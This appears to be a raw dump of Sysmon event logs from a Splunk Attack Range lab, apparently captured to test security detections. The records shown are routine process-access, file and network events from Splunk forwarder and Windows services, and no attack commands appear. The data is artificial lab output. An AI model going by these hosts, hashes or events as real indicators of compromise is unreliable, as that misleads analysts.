Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.589{4F8D34B0-1816-6216-1F05-000000003902}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D2A696995D308D8CA4691037360A515,SHA256=30D823FF17C852074BCA6FB70C73F03AEADFFE1CA4B8D3BAFBEF5F7686708655,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:46.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01785792EC61A3C737D55ECBA3936305,SHA256=1B91F389EF9BDF977A777BC2F1CD353B6A0F1B7EE452D81DDC9AB6AF978343E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:46.157{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.728{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80B95966C8F5090DB4A1EA24758E4328,SHA256=C441C71CAFC7B7D2BD930623AC7D7805086EB2229941D1C89CA3107B20A3D323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.728{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332D22189C7D125B6DA2CA27FD4A0DC1,SHA256=811C65CBC4E619F72F9657C89BC7800290AF1ABA66DDD4733012AD66A9DB7628,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:45.633{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49485-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000297841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:45.633{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49485-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000297840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:47.240{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50780D3969DCBCDABD2E57A02DF5F68,SHA256=DC3971DFDFD21D6836F764C6549B057BAF7E2F9AC0F01F9B46FFE1ECCD2890CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1817-6216-2005-000000003902}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1817-6216-2005-000000003902}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.087{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1817-6216-2005-000000003902}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.088{4F8D34B0-1817-6216-2005-000000003902}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:47.193{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68F8392B0308F434FD11275CE0ABC53D,SHA256=CB614BF428CCF8F5E0856FBD9CFD8083B14F458C87324B63D021A001AFE6BBB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:47.193{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2C0A713BB81B45CF9C99DBB1FEC1AC9,SHA256=22620DC2C3964A02F7FA2E233A1AD3ECB179C3B188D329C3630547B91346E0F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:48.931{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E3149261E8C375E43DA0AD70BEC672,SHA256=57E672C7BBE337AF052831BC6EDFD3F10CD92A0D42831ABB179C2F9DF0AD7C9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:46.545{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49486-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:48.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B33A76D26EDA51F6230FC9B1654197,SHA256=295D7CA6DF450C08589C851CD6F494784AA883558AFFA195F55708C5C33D0941,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.058{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51670-false10.0.1.12-8089- 23542300x8000000000000000297845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:49.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07B768AFD0BF6ACB420D3BBC20127A9,SHA256=657C085114DBEAD516B682A0A9AA96240D4DF8AFD9B898AEBF6F51A383FA26B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1819-6216-2205-000000003902}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 